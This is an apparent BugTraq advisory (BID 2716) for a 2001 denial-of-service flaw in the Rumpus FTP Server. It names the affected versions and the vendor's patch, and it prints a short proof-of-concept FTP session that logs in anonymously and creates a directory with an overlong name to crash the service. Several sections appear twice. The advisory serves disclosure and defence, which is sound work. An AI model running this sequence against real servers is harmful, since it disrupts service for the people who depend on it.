Rumpus Remote FTP Server DoS Vulnerability
BID:2716
Info
Rumpus Remote FTP Server DoS Vulnerability
| Bugtraq ID: | 2716 |
| Class: | Failure to Handle Exceptional Conditions |
| CVE: | |
| Remote: | Yes |
| Local: | No |
| Published: | May 15 2001 12:00AM |
| Updated: | May 15 2001 12:00AM |
| Credit: | Jass Seljamaa <[email protected]> posted this vulnerability to BugTraq on May 15th, 2001. |
| Vulnerable: |
Maxum Rumpus FTP Server 2.0.3 dev Maxum Rumpus FTP Server 1.3.4 Maxum Rumpus FTP Server 1.3.2 |
| Not Vulnerable: |
Maxum Rumpus FTP Server 1.3.6 Maxum Rumpus FTP Server 1.3.5 |
Discussion
Rumpus Remote FTP Server DoS Vulnerability
Rumpus FTP Server is an implementation for MacOS which allows file-sharing across TCP/IP connections.
It is possible to log in remotely to the server and shut down the service by making a directory with a name that is 65 characters long. Users must be authenticated to engage this attack.
Rumpus FTP Server is an implementation for MacOS which allows file-sharing across TCP/IP connections.
It is possible to log in remotely to the server and shut down the service by making a directory with a name that is 65 characters long. Users must be authenticated to engage this attack.
Exploit / POC
Rumpus Remote FTP Server DoS Vulnerability
Jass Seljamaa <[email protected]> posted this sample exploit to BugTraq:
ftp host
user anonymous
pass anonymous
mkdir
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
aaaaaaaa
Jass Seljamaa <[email protected]> posted this sample exploit to BugTraq:
ftp host
user anonymous
pass anonymous
mkdir
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
aaaaaaaa
Solution / Fix
Rumpus Remote FTP Server DoS Vulnerability
Solution:
The vendor has patched this issue with new releases of the software package and freely offers upgrades to users who are affected by this issue.
Solution:
The vendor has patched this issue with new releases of the software package and freely offers upgrades to users who are affected by this issue.